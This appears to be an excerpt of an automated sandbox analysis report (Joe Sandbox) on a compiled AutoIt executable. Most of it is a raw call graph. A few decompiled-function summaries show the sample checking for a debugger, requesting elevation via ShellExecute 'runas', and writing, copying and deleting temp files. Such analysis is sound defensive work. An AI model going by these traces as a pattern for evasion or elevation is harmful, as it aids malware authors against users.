API calls 101141->101225 101226 4ac5c3 331 API calls 101141->101226 101227 4ab53c 331 API calls Mailbox 101141->101227 101229 439c90 59 API calls Mailbox 101141->101229 101230 4a93c6 331 API calls Mailbox 101141->101230 101228 499e4a 89 API calls 4 library calls 101142->101228 101145->101141 101147->101141 101152 473e25 101152->101066 101154 43f650 101153->101154 101155 43f4ba 101153->101155 101158 437de1 59 API calls 101154->101158 101156 43f4c6 101155->101156 101157 47441e 101155->101157 101401 43f290 331 API calls 2 library calls 101156->101401 101403 4abc6b 101157->101403 101164 43f58c Mailbox 101158->101164 101161 47442c 101165 43f630 
101161->101165 101443 499e4a 89 API calls 4 library calls 101161->101443 101163 43f4fd 101163->101161 101163->101164 101163->101165 101309 49cb7a 101164->101309 101389 4a445a 101164->101389 101398 493c37 101164->101398 101165->101066 101167 43f5e3 101167->101165 101402 439c90 59 API calls Mailbox 101167->101402 101171->101066 101172->101066 101173->100996 101174->101002 101175->101066 101176->101003 101177->101003 101178->101003 101179->101066 101180->101066 101181->101066 101183 439851 101182->101183 101192 43984b 101182->101192 101184 439857 __itow 101183->101184 101185 439899 101183->101185 101186 46f5d3 __i64tow 101183->101186 101188 46f4da 101183->101188 101189 450db6 Mailbox 59 API calls 101184->101189 102235 453698 83 API calls 3 library calls 101185->102235 101186->101186 101193 450db6 Mailbox 59 API calls 101188->101193 101199 46f552 Mailbox _wcscpy 101188->101199 101191 439871 101189->101191 101191->101192 101194 437de1 59 API calls 101191->101194 101192->101066 101195 46f51f 101193->101195 101194->101192 101196 450db6 Mailbox 59 API calls 101195->101196 101197 46f545 101196->101197 101198 437de1 59 API calls 101197->101198 101197->101199 101198->101199 102236 453698 83 API calls 3 library calls 101199->102236 101200->101066 101201->101066 101202->101066 101204 450db6 Mailbox 59 API calls 101203->101204 101205 437688 101204->101205 101206 450db6 Mailbox 59 API calls 101205->101206 101207 437696 101206->101207 101207->101052 101208->101052 101209->101052 101211 437df0 __wsetenvp _memmove 101210->101211 101212 450db6 Mailbox 59 API calls 101211->101212 101213 437e2e 101212->101213 101213->101052 101214->101052 101215->101052 101216->101052 101217->101052 101218->101052 101219->101141 101220->101141 101231 452c44 101221->101231 101223 452d4b 101223->101137 101224->101141 101225->101141 101226->101141 101227->101141 101228->101152 101229->101141 101230->101141 101232 452c50 __close 101231->101232 101239 453217 101232->101239 101238 452c77 __close 
101238->101223 101256 459c0b 101239->101256 101241 452c59 101242 452c88 DecodePointer DecodePointer 101241->101242 101243 452cb5 101242->101243 101244 452c65 101242->101244 101243->101244 101302 4587a4 59 API calls __wopenfile 101243->101302 101253 452c82 101244->101253 101246 452d18 EncodePointer EncodePointer 101246->101244 101247 452cc7 101247->101246 101248 452cec 101247->101248 101303 458864 61 API calls __realloc_crt 101247->101303 101248->101244 101251 452d06 EncodePointer 101248->101251 101304 458864 61 API calls __realloc_crt 101248->101304 101251->101246 101252 452d00 101252->101244 101252->101251 101305 453220 101253->101305 101257 459c1c 101256->101257 101258 459c2f EnterCriticalSection 101256->101258 101263 459c93 101257->101263 101258->101241 101260 459c22 101260->101258 101287 4530b5 58 API calls 3 library calls 101260->101287 101264 459c9f __close 101263->101264 101265 459cc0 101264->101265 101266 459ca8 101264->101266 101268 459ce1 __close 101265->101268 101291 45881d 58 API calls 2 library calls 101265->101291 101288 45a16b 58 API calls __NMSG_WRITE 101266->101288 101268->101260 101269 459cad 101289 45a1c8 58 API calls 7 library calls 101269->101289 101271 459cd5 101273 459cdc 101271->101273 101274 459ceb 101271->101274 101292 458b28 58 API calls __getptd_noexit 101273->101292 101277 459c0b __lock 58 API calls 101274->101277 101275 459cb4 101290 45309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101275->101290 101279 459cf2 101277->101279 101281 459d17 101279->101281 101282 459cff 101279->101282 101294 452d55 101281->101294 101293 459e2b InitializeCriticalSectionAndSpinCount 101282->101293 101285 459d0b 101300 459d33 LeaveCriticalSection _doexit 101285->101300 101288->101269 101289->101275 101291->101271 101292->101268 101293->101285 101295 452d5e RtlFreeHeap 101294->101295 101299 452d87 __dosmaperr 101294->101299 101296 452d73 101295->101296 101295->101299 101301 458b28 58 API calls __getptd_noexit 101296->101301 101298 
452d79 GetLastError 101298->101299 101299->101285 101300->101268 101301->101298 101302->101247 101303->101248 101304->101252 101308 459d75 LeaveCriticalSection 101305->101308 101307 452c87 101307->101238 101308->101307 101310 437667 59 API calls 101309->101310 101311 49cbaf 101310->101311 101312 437667 59 API calls 101311->101312 101313 49cbb8 101312->101313 101314 49cbcc 101313->101314 101631 439b3c 59 API calls 101313->101631 101316 439837 84 API calls 101314->101316 101317 49cbe9 101316->101317 101318 49cc0b 101317->101318 101319 49ccea 101317->101319 101324 49cd1a Mailbox 101317->101324 101320 439837 84 API calls 101318->101320 101444 434ddd 101319->101444 101322 49cc17 101320->101322 101325 438047 59 API calls 101322->101325 101324->101167 101328 49cc23 101325->101328 101326 49cd16 101326->101324 101327 437667 59 API calls 101326->101327 101330 49cd4b 101327->101330 101333 49cc69 101328->101333 101334 49cc37 101328->101334 101329 434ddd 136 API calls 101329->101326 101331 437667 59 API calls 101330->101331 101332 49cd54 101331->101332 101337 437667 59 API calls 101332->101337 101336 439837 84 API calls 101333->101336 101335 438047 59 API calls 101334->101335 101338 49cc47 101335->101338 101339 49cc76 101336->101339 101340 49cd5d 101337->101340 101341 437cab 59 API calls 101338->101341 101342 438047 59 API calls 101339->101342 101343 437667 59 API calls 101340->101343 101344 49cc51 101341->101344 101345 49cc82 101342->101345 101346 49cd66 101343->101346 101347 439837 84 API calls 101344->101347 101632 494a31 GetFileAttributesW 101345->101632 101349 439837 84 API calls 101346->101349 101350 49cc5d 101347->101350 101352 49cd73 101349->101352 101354 437b2e 59 API calls 101350->101354 101351 49cc8b 101357 4379f2 59 API calls 101351->101357 101358 49cc9e 101351->101358 101468 43459b 101352->101468 101354->101333 101355 49cd8e 101519 4379f2 101355->101519 101356 439837 84 API calls 101360 49cccb 101356->101360 101357->101358 101358->101356 101364 49cca4 
101358->101364 101633 4937ef 75 API calls Mailbox 101360->101633 101363 49cdd1 101366 438047 59 API calls 101363->101366 101364->101324 101365 4379f2 59 API calls 101367 49cdae 101365->101367 101368 49cddf 101366->101368 101367->101363 101370 437bcc 59 API calls 101367->101370 101369 437b2e 59 API calls 101368->101369 101371 49cded 101369->101371 101373 49cdc3 101370->101373 101372 437b2e 59 API calls 101371->101372 101374 49cdfb 101372->101374 101375 437bcc 59 API calls 101373->101375 101376 437b2e 59 API calls 101374->101376 101375->101363 101377 49ce09 101376->101377 101378 439837 84 API calls 101377->101378 101379 49ce15 101378->101379 101522 494071 101379->101522 101381 49ce26 101382 493c37 3 API calls 101381->101382 101383 49ce30 101382->101383 101384 439837 84 API calls 101383->101384 101387 49ce61 101383->101387 101385 49ce4e 101384->101385 101576 499155 101385->101576 101634 434e4a 101387->101634 101390 439837 84 API calls 101389->101390 101391 4a4494 101390->101391 102183 436240 101391->102183 101393 4a44a4 101394 4a44c9 101393->101394 101395 439ea0 331 API calls 101393->101395 101397 4a44cd 101394->101397 102208 439a98 59 API calls Mailbox 101394->102208 101395->101394 101397->101167 102223 49445a GetFileAttributesW 101398->102223 101401->101163 101402->101167 101404 4abcb0 101403->101404 101405 4abc96 101403->101405 102228 4aa213 59 API calls Mailbox 101404->102228 102227 499e4a 89 API calls 4 library calls 101405->102227 101408 4abcbb 101409 439ea0 330 API calls 101408->101409 101411 4abd1c 101409->101411 101410 4abca8 Mailbox 101410->101161 101411->101410 101412 4abdae 101411->101412 101416 4abd5d 101411->101416 101413 4abe04 101412->101413 101414 4abdb4 101412->101414 101413->101410 101415 439837 84 API calls 101413->101415 102230 49791a 59 API calls 101414->102230 101417 4abe16 101415->101417 102229 4972df 59 API calls Mailbox 101416->102229 101419 437e4f 59 API calls 101417->101419 101422 4abe3a CharUpperBuffW 101419->101422 101420 4abdd7 102231 
435d41 59 API calls Mailbox 101420->102231 101426 4abe54 101422->101426 101424 4abd8d 101425 43f460 330 API calls 101424->101425 101425->101410 101427 4abe5b 101426->101427 101428 4abea7 101426->101428 102232 4972df 59 API calls Mailbox 101427->102232 101430 439837 84 API calls 101428->101430 101429 4abddf Mailbox 101431 43fce0 330 API calls 101429->101431 101432 4abeaf 101430->101432 101431->101410 102233 439e5d 60 API calls 101432->102233 101435 4abe89 101436 43f460 330 API calls 101435->101436 101436->101410 101437 4abeb9 101437->101410 101438 439837 84 API calls 101437->101438 101439 4abed4 101438->101439 102234 435d41 59 API calls Mailbox 101439->102234 101441 4abee4 101442 43fce0 330 API calls 101441->101442 101442->101410 101443->101165 101640 434bb5 101444->101640 101449 46d8e6 101452 434e4a 84 API calls 101449->101452 101450 434e08 LoadLibraryExW 101650 434b6a 101450->101650 101454 46d8ed 101452->101454 101456 434b6a 3 API calls 101454->101456 101458 46d8f5 101456->101458 101457 434e2f 101457->101458 101459 434e3b 101457->101459 101676 434f0b 101458->101676 101460 434e4a 84 API calls 101459->101460 101463 434e40 101460->101463 101463->101326 101463->101329 101465 46d91c 101684 434ec7 101465->101684 101469 437667 59 API calls 101468->101469 101470 4345b1 101469->101470 101471 437667 59 API calls 101470->101471 101472 4345b9 101471->101472 101473 437667 59 API calls 101472->101473 101474 4345c1 101473->101474 101475 437667 59 API calls 101474->101475 101476 4345c9 101475->101476 101477 46d4d2 101476->101477 101478 4345fd 101476->101478 101479 438047 59 API calls 101477->101479 101480 43784b 59 API calls 101478->101480 101481 46d4db 101479->101481 101482 43460b 101480->101482 101872 437d8c 101481->101872 101484 437d2c 59 API calls 101482->101484 101485 434615 101484->101485 101486 434640 101485->101486 101487 43784b 59 API calls 101485->101487 101489 43465f 101486->101489 101490 46d4fb 101486->101490 101503 434680 101486->101503 101491 434636 101487->101491 
101492 4379f2 59 API calls 101489->101492 101494 46d5cb 101490->101494 101505 46d5b4 101490->101505 101512 46d532 101490->101512 101495 437d2c 59 API calls 101491->101495 101496 434669 101492->101496 101493 434691 101497 4346a3 101493->101497 101499 438047 59 API calls 101493->101499 101498 437bcc 59 API calls 101494->101498 101495->101486 101501 43784b 59 API calls 101496->101501 101496->101503 101500 4346b3 101497->101500 101502 438047 59 API calls 101497->101502 101514 46d588 101498->101514 101499->101497 101504 438047 59 API calls 101500->101504 101506 4346ba 101500->101506 101501->101503 101502->101500 101859 43784b 101503->101859 101504->101506 101505->101494 101509 46d59f 101505->101509 101507 438047 59 API calls 101506->101507 101516 4346c1 Mailbox 101506->101516 101507->101516 101508 46d590 101510 437bcc 59 API calls 101508->101510 101511 437bcc 59 API calls 101509->101511 101510->101514 101511->101514 101512->101508 101517 46d57b 101512->101517 101513 4379f2 59 API calls 101513->101514 101514->101503 101514->101513 101876 437924 59 API calls 2 library calls 101514->101876 101516->101355 101518 437bcc 59 API calls 101517->101518 101518->101514 101520 437e4f 59 API calls 101519->101520 101521 4379fd 101520->101521 101521->101363 101521->101365 101523 49408d 101522->101523 101524 4940a0 101523->101524 101525 494092 101523->101525 101526 437667 59 API calls 101524->101526 101527 438047 59 API calls 101525->101527 101528 4940a8 101526->101528 101575 49409b Mailbox 101527->101575 101529 437667 59 API calls 101528->101529 101530 4940b0 101529->101530 101531 437667 59 API calls 101530->101531 101532 4940bb 101531->101532 101533 437667 59 API calls 101532->101533 101534 4940c3 101533->101534 101535 437667 59 API calls 101534->101535 101536 4940cb 101535->101536 101537 437667 59 API calls 101536->101537 101538 4940d3 101537->101538 101539 437667 59 API calls 101538->101539 101540 4940db 101539->101540 101541 437667 59 API calls 101540->101541 101542 4940e3 
101541->101542 101543 43459b 59 API calls 101542->101543 101544 4940fa 101543->101544 101545 43459b 59 API calls 101544->101545 101546 494113 101545->101546 101547 4379f2 59 API calls 101546->101547 101548 49411f 101547->101548 101549 494132 101548->101549 101550 437d2c 59 API calls 101548->101550 101551 4379f2 59 API calls 101549->101551 101550->101549 101552 49413b 101551->101552 101553 49414b 101552->101553 101554 437d2c 59 API calls 101552->101554 101555 438047 59 API calls 101553->101555 101554->101553 101556 494157 101555->101556 101557 437b2e 59 API calls 101556->101557 101558 494163 101557->101558 101878 494223 59 API calls 101558->101878 101560 494172 101879 494223 59 API calls 101560->101879 101562 494185 101563 4379f2 59 API calls 101562->101563 101564 49418f 101563->101564 101565 494194 101564->101565 101566 4941a6 101564->101566 101567 437cab 59 API calls 101565->101567 101568 4379f2 59 API calls 101566->101568 101569 4941a1 101567->101569 101570 4941af 101568->101570 101573 437b2e 59 API calls 101569->101573 101571 4941cd 101570->101571 101572 437cab 59 API calls 101570->101572 101574 437b2e 59 API calls 101571->101574 101572->101569 101573->101571 101574->101575 101575->101381 101577 499162 __write_nolock 101576->101577 101578 450db6 Mailbox 59 API calls 101577->101578 101579 4991bf 101578->101579 101580 43522e 59 API calls 101579->101580 101581 4991c9 101580->101581 101582 498f5f GetSystemTimeAsFileTime 101581->101582 101583 4991d4 101582->101583 101584 434ee5 85 API calls 101583->101584 101585 4991e7 _wcscmp 101584->101585 101586 4992b8 101585->101586 101587 49920b 101585->101587 101588 499734 96 API calls 101586->101588 101910 499734 101587->101910 101601 499284 _wcscat 101588->101601 101592 434f0b 74 API calls 101594 4992dd 101592->101594 101593 4992c1 101593->101387 101595 434f0b 74 API calls 101594->101595 101597 4992ed 101595->101597 101596 499239 _wcscat _wcscpy 101917 4540fb 58 API calls __wsplitpath_helper 101596->101917 101598 434f0b 74 
API calls 101597->101598 101600 499308 101598->101600 101602 434f0b 74 API calls 101600->101602 101601->101592 101601->101593 101603 499318 101602->101603 101604 434f0b 74 API calls 101603->101604 101605 499333 101604->101605 101606 434f0b 74 API calls 101605->101606 101607 499343 101606->101607 101608 434f0b 74 API calls 101607->101608 101609 499353 101608->101609 101610 434f0b 74 API calls 101609->101610 101611 499363 101610->101611 101880 4998e3 GetTempPathW GetTempFileNameW 101611->101880 101613 49936f 101614 45525b 115 API calls 101613->101614 101624 499380 101614->101624 101615 49943a 101894 4553a6 101615->101894 101617 499445 101619 49944b DeleteFileW 101617->101619 101620 49945f 101617->101620 101618 434f0b 74 API calls 101618->101624 101619->101593 101621 499505 CopyFileW 101620->101621 101626 499469 _wcsncpy 101620->101626 101622 49951b DeleteFileW 101621->101622 101623 49952d DeleteFileW 101621->101623 101622->101593 101907 4998a2 CreateFileW 101623->101907 101624->101593 101624->101615 101624->101618 101881 454863 101624->101881 101918 498b06 116 API calls __fcloseall 101626->101918 101629 4994f0 101629->101623 101630 4994f4 DeleteFileW 101629->101630 101630->101593 101631->101314 101632->101351 101633->101364 101635 434e54 101634->101635 101637 434e5b 101634->101637 101636 4553a6 __fcloseall 83 API calls 101635->101636 101636->101637 101638 434e7b FreeLibrary 101637->101638 101639 434e6a 101637->101639 101638->101639 101639->101324 101689 434c03 101640->101689 101643 434bf5 101647 45525b 101643->101647 101644 434bec FreeLibrary 101644->101643 101645 434c03 2 API calls 101646 434bdc 101645->101646 101646->101643 101646->101644 101693 455270 101647->101693 101649 434dfc 101649->101449 101649->101450 101774 434c36 101650->101774 101653 434c36 2 API calls 101656 434b8f 101653->101656 101654 434ba1 FreeLibrary 101655 434baa 101654->101655 101657 434c70 101655->101657 101656->101654 101656->101655 101658 450db6 Mailbox 59 API calls 101657->101658 101659 
434c85 101658->101659 101778 43522e 101659->101778 101661 434c91 _memmove 101662 434ccc 101661->101662 101664 434dc1 101661->101664 101665 434d89 101661->101665 101663 434ec7 69 API calls 101662->101663 101672 434cd5 101663->101672 101792 49991b 95 API calls 101664->101792 101781 434e89 CreateStreamOnHGlobal 101665->101781 101668 434f0b 74 API calls 101668->101672 101670 434d69 101670->101457 101671 46d8a7 101673 434ee5 85 API calls 101671->101673 101672->101668 101672->101670 101672->101671 101787 434ee5 101672->101787 101674 46d8bb 101673->101674 101675 434f0b 74 API calls 101674->101675 101675->101670 101677 434f1d 101676->101677 101680 46d9cd 101676->101680 101816 4555e2 101677->101816 101681 499109 101836 498f5f 101681->101836 101683 49911f 101683->101465 101685 434ed6 101684->101685 101686 46d990 101684->101686 101841 455c60 101685->101841 101688 434ede 101690 434bd0 101689->101690 101691 434c0c LoadLibraryA 101689->101691 101690->101645 101690->101646 101691->101690 101692 434c1d GetProcAddress 101691->101692 101692->101690 101695 45527c __close 101693->101695 101694 45528f 101742 458b28 58 API calls __getptd_noexit 101694->101742 101695->101694 101697 4552c0 101695->101697 101712 4604e8 101697->101712 101698 455294 101743 458db6 9 API calls __wopenfile 101698->101743 101701 4552c5 101702 4552ce 101701->101702 101703 4552db 101701->101703 101744 458b28 58 API calls __getptd_noexit 101702->101744 101705 455305 101703->101705 101706 4552e5 101703->101706 101727 460607 101705->101727 101745 458b28 58 API calls __getptd_noexit 101706->101745 101707 45529f __close @_EH4_CallFilterFunc@8 101707->101649 101713 4604f4 __close 101712->101713 101714 459c0b __lock 58 API calls 101713->101714 101725 460502 101714->101725 101715 460576 101747 4605fe 101715->101747 101716 46057d 101752 45881d 58 API calls 2 library calls 101716->101752 101719 460584 101719->101715 101753 459e2b InitializeCriticalSectionAndSpinCount 101719->101753 101720 4605f3 __close 101720->101701 
101722 459c93 __mtinitlocknum 58 API calls 101722->101725 101724 4605aa EnterCriticalSection 101724->101715 101725->101715 101725->101716 101725->101722 101750 456c50 59 API calls __lock 101725->101750 101751 456cba LeaveCriticalSection LeaveCriticalSection _doexit 101725->101751 101736 460627 __wopenfile 101727->101736 101728 460641 101758 458b28 58 API calls __getptd_noexit 101728->101758 101730 4607fc 101730->101728 101734 46085f 101730->101734 101731 460646 101759 458db6 9 API calls __wopenfile 101731->101759 101733 455310 101746 455332 LeaveCriticalSection LeaveCriticalSection __wfsopen 101733->101746 101755 4685a1 101734->101755 101736->101728 101736->101730 101760 4537cb 60 API calls 2 library calls 101736->101760 101738 4607f5 101738->101730 101761 4537cb 60 API calls 2 library calls 101738->101761 101740 460814 101740->101730 101762 4537cb 60 API calls 2 library calls 101740->101762 101742->101698 101743->101707 101744->101707 101745->101707 101746->101707 101754 459d75 LeaveCriticalSection 101747->101754 101749 460605 101749->101720 101750->101725 101751->101725 101752->101719 101753->101724 101754->101749 101763 467d85 101755->101763 101757 4685ba 101757->101733 101758->101731 101759->101733 101760->101738 101761->101740 101762->101730 101764 467d91 __close 101763->101764 101765 467da7 101764->101765 101768 467ddd 101764->101768 101766 458b28 __wopenfile 58 API calls 101765->101766 101767 467dac 101766->101767 101769 458db6 __wopenfile 9 API calls 101767->101769 101770 467e4e __wsopen_nolock 109 API calls 101768->101770 101773 467db6 __close 101769->101773 101771 467df9 101770->101771 101772 467e22 __wsopen_helper LeaveCriticalSection 101771->101772 101772->101773 101773->101757 101775 434b83 101774->101775 101776 434c3f LoadLibraryA 101774->101776 101775->101653 101775->101656 101776->101775 101777 434c50 GetProcAddress 101776->101777 101777->101775 101779 450db6 Mailbox 59 API calls 101778->101779 101780 435240 101779->101780 101780->101661 101782 
434ea3 FindResourceExW 101781->101782 101786 434ec0 101781->101786 101783 46d933 LoadResource 101782->101783 101782->101786 101784 46d948 SizeofResource 101783->101784 101783->101786 101785 46d95c LockResource 101784->101785 101784->101786 101785->101786 101786->101662 101788 434ef4 101787->101788 101789 46d9ab 101787->101789 101793 45584d 101788->101793 101791 434f02 101791->101672 101792->101662 101794 455859 __close 101793->101794 101795 45586b 101794->101795 101797 455891 101794->101797 101806 458b28 58 API calls __getptd_noexit 101795->101806 101808 456c11 101797->101808 101798 455870 101807 458db6 9 API calls __wopenfile 101798->101807 101803 4558a6 101815 4558c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 101803->101815 101805 45587b __close 101805->101791 101806->101798 101807->101805 101809 456c21 101808->101809 101810 456c43 EnterCriticalSection 101808->101810 101809->101810 101811 456c29 101809->101811 101812 455897 101810->101812 101813 459c0b __lock 58 API calls 101811->101813 101814 4557be 83 API calls 4 library calls 101812->101814 101813->101812 101814->101803 101815->101805 101819 4555fd 101816->101819 101818 434f2e 101818->101681 101820 455609 __close 101819->101820 101821 45564c 101820->101821 101822 45561f _memset 101820->101822 101823 455644 __close 101820->101823 101824 456c11 __lock_file 59 API calls 101821->101824 101832 458b28 58 API calls __getptd_noexit 101822->101832 101823->101818 101826 455652 101824->101826 101834 45541d 72 API calls 6 library calls 101826->101834 101828 455639 101833 458db6 9 API calls __wopenfile 101828->101833 101829 455668 101835 455686 LeaveCriticalSection LeaveCriticalSection __wfsopen 101829->101835 101832->101828 101833->101823 101834->101829 101835->101823 101839 45520a GetSystemTimeAsFileTime 101836->101839 101838 498f6e 101838->101683 101840 455238 __aulldiv 101839->101840 101840->101838 101842 455c6c __close 101841->101842 101843 455c93 101842->101843 101844 455c7e 101842->101844 101845 456c11 
__lock_file 59 API calls 101843->101845 101855 458b28 58 API calls __getptd_noexit 101844->101855 101847 455c99 101845->101847 101857 4558d0 67 API calls 6 library calls 101847->101857 101848 455c83 101856 458db6 9 API calls __wopenfile 101848->101856 101851 455ca4 101858 455cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 101851->101858 101852 455c8e __close 101852->101688 101854 455cb6 101854->101852 101855->101848 101856->101852 101857->101851 101858->101854 101860 4378b7 101859->101860 101861 43785a 101859->101861 101862 437d2c 59 API calls 101860->101862 101861->101860 101863 437865 101861->101863 101868 437888 _memmove 101862->101868 101864 437880 101863->101864 101865 46eb09 101863->101865 101877 437f27 59 API calls Mailbox 101864->101877 101867 438029 59 API calls 101865->101867 101869 46eb13 101867->101869 101868->101493 101870 450db6 Mailbox 59 API calls 101869->101870 101871 46eb33 101870->101871 101873 437da6 101872->101873 101875 437d99 101872->101875 101874 450db6 Mailbox 59 API calls 101873->101874 101874->101875 101875->101486 101876->101514 101877->101868 101878->101560 101879->101562 101880->101613 101882 45486f __close 101881->101882 101883 4548a5 101882->101883 101884 45488d 101882->101884 101885 45489d __close 101882->101885 101886 456c11 __lock_file 59 API calls 101883->101886 101931 458b28 58 API calls __getptd_noexit 101884->101931 101885->101624 101888 4548ab 101886->101888 101919 45470a 101888->101919 101889 454892 101932 458db6 9 API calls __wopenfile 101889->101932 101895 4553b2 __close 101894->101895 101896 4553c6 101895->101896 101898 4553de 101895->101898 102110 458b28 58 API calls __getptd_noexit 101896->102110 101900 456c11 __lock_file 59 API calls 101898->101900 101903 4553d6 __close 101898->101903 101899 4553cb 102111 458db6 9 API calls __wopenfile 101899->102111 101902 4553f0 101900->101902 102094 45533a 101902->102094 101903->101617 101908 4998c8 SetFileTime CloseHandle 101907->101908 101909 4998de 101907->101909 
103429->103430 103431 437d8c 59 API calls 103430->103431 103432 437194 RegOpenKeyExW 103431->103432 103433 46e8b1 RegQueryValueExW 103432->103433 103438 4371b6 Mailbox 103432->103438 103434 46e943 RegCloseKey 103433->103434 103435 46e8ce 103433->103435 103434->103438 103446 46e955 _wcscat Mailbox __wsetenvp 103434->103446 103436 450db6 Mailbox 59 API calls 103435->103436 103437 46e8e7 103436->103437 103439 43522e 59 API calls 103437->103439 103438->103414 103440 46e8f2 RegQueryValueExW 103439->103440 103441 46e90f 103440->103441 103443 46e929 103440->103443 103442 437bcc 59 API calls 103441->103442 103442->103443 103443->103434 103444 437de1 59 API calls 103444->103446 103445 433f74 59 API calls 103445->103446 103446->103438 103446->103444 103446->103445 103447 4379f2 59 API calls 103446->103447 103447->103446 103449 461940 __write_nolock 103448->103449 103450 450518 GetFullPathNameW 103449->103450 103451 45053a 103450->103451 103452 437bcc 59 API calls 103451->103452 103453 437165 103452->103453 103453->103425

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00433B68
                                                              • IsDebuggerPresent.KERNEL32 ref: 00433B7A
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004F52F8,004F52E0,?,?), ref: 00433BEB
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                                • Part of subcall function 0044092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00433C14,004F52F8,?,?,?), ref: 0044096E
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00433C6F
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004E7770,00000010), ref: 0046D281
                                                              • SetCurrentDirectoryW.KERNEL32(?,004F52F8,?,?,?), ref: 0046D2B9
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004E4260,004F52F8,?,?,?), ref: 0046D33F
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0046D346
                                                                • Part of subcall function 00433A46: GetSysColorBrush.USER32(0000000F), ref: 00433A50
                                                                • Part of subcall function 00433A46: LoadCursorW.USER32(00000000,00007F00), ref: 00433A5F
                                                                • Part of subcall function 00433A46: LoadIconW.USER32(00000063), ref: 00433A76
                                                                • Part of subcall function 00433A46: LoadIconW.USER32(000000A4), ref: 00433A88
                                                                • Part of subcall function 00433A46: LoadIconW.USER32(000000A2), ref: 00433A9A
                                                                • Part of subcall function 00433A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00433AC0
                                                                • Part of subcall function 00433A46: RegisterClassExW.USER32(?), ref: 00433B16
                                                                • Part of subcall function 004339D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00433A03
                                                                • Part of subcall function 004339D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00433A24
                                                                • Part of subcall function 004339D5: ShowWindow.USER32(00000000,?,?), ref: 00433A38
                                                                • Part of subcall function 004339D5: ShowWindow.USER32(00000000,?,?), ref: 00433A41
                                                                • Part of subcall function 0043434A: _memset.LIBCMT ref: 00434370
                                                                • Part of subcall function 0043434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00434415
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                              • String ID: This is a third-party compiled AutoIt script.$runas$%L
                                                              • API String ID: 529118366-3609972046
                                                              • Opcode ID: dccdfbc5d9e5e567a615d2ec14087e3ec0ffbc0bd5dca889c181f58e0542cdce
                                                              • Instruction ID: 5d57f81c1e0482f716e4892394bc2ceac60426254a4214a4856b9edb30477701
                                                              • Opcode Fuzzy Hash: dccdfbc5d9e5e567a615d2ec14087e3ec0ffbc0bd5dca889c181f58e0542cdce
                                                              • Instruction Fuzzy Hash: 88511671E04108AADB10EFB5DC05AFE7B74AF08715F0061BBF651A22A1DA785605CB2D

                                                              Control-flow Graph

                                                              Control-flow graph for the function at 004349A0 (rendered graph with executed/not-executed colouring not reproduced). Nodes reference GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo.
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 004349CD
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • GetCurrentProcess.KERNEL32(?,004BFAEC,00000000,00000000,?), ref: 00434A9A
                                                              • IsWow64Process.KERNEL32(00000000), ref: 00434AA1
                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00434AE7
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00434AF2
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00434B23
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00434B2F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                              • String ID:
                                                              • API String ID: 1986165174-0
                                                              • Opcode ID: 5c9a4357339921b4f17e902603f7ccf7e627c574920bb4151bd5ef683f0001e2
                                                              • Instruction ID: 44c7c845859ebce400d2f4e4cdedf7bd5d9c1ab85570b55a0a8f6daf16cab874
                                                              • Opcode Fuzzy Hash: 5c9a4357339921b4f17e902603f7ccf7e627c574920bb4151bd5ef683f0001e2
                                                              • Instruction Fuzzy Hash: 8B91A2319897C4DAC731DBA884501ABFFE5AF6D300F44596FD0CA93B41D228B948C76E

